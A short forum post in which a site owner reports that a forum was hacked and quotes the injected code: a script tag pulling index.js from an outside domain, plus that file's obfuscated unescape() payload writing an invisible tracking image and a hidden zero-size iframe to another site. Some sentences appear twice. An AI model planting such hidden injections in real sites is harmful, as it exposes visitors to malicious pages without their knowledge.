A new forum I’ve been developing/promoting was hacked very recently. I’m not sure how they did it, but I’m improving the forum’s security at the moment.
The hacker(s) inserted a single line of code in one critical file.
I downloaded ‘index.js’:
Any one else had a forum/site hacked in a similar way?
The hacker(s) inserted a single line of code in one critical file.
<script src="http://healingeczema.com/index.js"></script>
I downloaded ‘index.js’:
var var37458745 =
unescape(
"%3C%69%6D%67%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%61%69%6E%73%79%73%74%65"+
"%6D%73%69%74%65%2E%63%6F%6D%2F%63%6F%75%6E%74%65%72%2F%63%6F%75%6E%74%65%72%2E%70%68%70%27"+
"%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E"
);
document.write(var37458745);
document.write('<iframe src="http://baarish.co.uk/go.php" style=width:0;height:0;visibility:none;border:0"></iframe>');
Any one else had a forum/site hacked in a similar way?